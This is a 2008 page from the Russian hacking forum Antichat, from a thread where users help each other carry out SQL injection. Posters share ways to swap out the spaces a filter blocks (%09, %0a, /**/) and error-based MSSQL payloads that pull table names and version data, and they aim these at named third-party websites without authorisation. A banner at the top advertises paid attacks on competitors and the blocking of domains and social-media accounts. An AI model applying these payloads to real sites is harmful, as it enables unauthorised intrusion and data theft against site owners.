Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 216 из 2438

216

Опции темы

Поиск в этой теме

Опции просмотра

#2151

30.05.2008, 07:16

Lesnoy_chelovek

Постоянный

Регистрация: 06.12.2006

Сообщений: 321

С нами: 10226273

Репутация: 370

NAT_uu, экранирование кавычки есть и скуля есть, если ты сумеешь экранирование обойти.

#2152

30.05.2008, 08:09

1SeTh

Участник форума

Регистрация: 17.02.2006

Сообщений: 189

С нами: 10646246

Репутация: 34

чем можно заменить + или %20 и еще /**/ на что то другое?

#2153

30.05.2008, 08:17

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

С нами: 10692266

Репутация: 3486

Цитата:

Сообщение от +toxa+

разделение запросов может быть если делать mysql_real_connect()

union select null from blablabla
И как тут делать mysql_real_connect() ? Что то я тебя понять не могу.

__________________
..

Последний раз редактировалось .Slip; 30.05.2008 в 08:26..

#2154

30.05.2008, 08:18

z3r0cool

Познающий

Регистрация: 22.04.2008

Сообщений: 32

С нами: 9501269

Репутация: 56

Цитата:

Сообщение от 1SeTh

чем можно заменить + или %20 и еще /**/ на что то другое?

%09, а вообще, почитай про "управляющие символы" здесь:
http://ru.wikipedia.org/

Последний раз редактировалось z3r0cool; 30.05.2008 в 08:41..

#2155

30.05.2008, 11:00

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

С нами: 9619229

Репутация: 445

http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул

#2156

30.05.2008, 11:13

z3r0cool

Познающий

Регистрация: 22.04.2008

Сообщений: 32

С нами: 9501269

Репутация: 56

Цитата:

Сообщение от diznt

http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул

Используй ошибки для вывода данных.

http://www.kdo.ru/article.asp?id=5709&cid=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES)

#2157

30.05.2008, 11:17

Dima-k17

Познающий

Регистрация: 15.09.2005

Сообщений: 60

С нами: 10869277

Репутация: 52

Цитата:

Сообщение от diznt

http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул

ммммм.... Обчный МССкуль=)

Код:

http://www.kdo.ru/article.asp?id=5709&cid=1%20OR%201=@@version

А на мой вопрос в этой теме так и не ответили((((
---
Не успел отправить=)

#2158

30.05.2008, 12:26

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

С нами: 9593606

Репутация: 4915

Цитата:

Сообщение от Lesnoy_chelovek

NAT_uu, экранирование кавычки есть и скуля есть, если ты сумеешь экранирование обойти.

Очень интересно.Функция mysql_real_escape_string как раз и позволяет защититься от инъекции .Если есть способ обхода, хотелось бы увидеть
2 NAT_uu ИМХО в этом скрипте инъекцию не проведёшь

#2159

30.05.2008, 12:29

brasco2k

Постоянный

Регистрация: 23.11.2007

Сообщений: 342

С нами: 9718355

Репутация: 310

Цитата:

Сообщение от 1SeTh

чем можно заменить + или %20 и еще /**/ на что то другое?

+, /**/, %20, %09, %0a, %0d, %2b.

#2160

30.05.2008, 13:59

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

С нами: 9976706

Репутация: 1934

Чёт не разберусь никак с одной скулей...Может кто справится!?

Код:

http://micropig.com/microlink/?srch=2&start=30&searchtext=ya.ru'
http://micropig.com/microlink/category/58/start/3'

Страница 216 из 2438

216

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход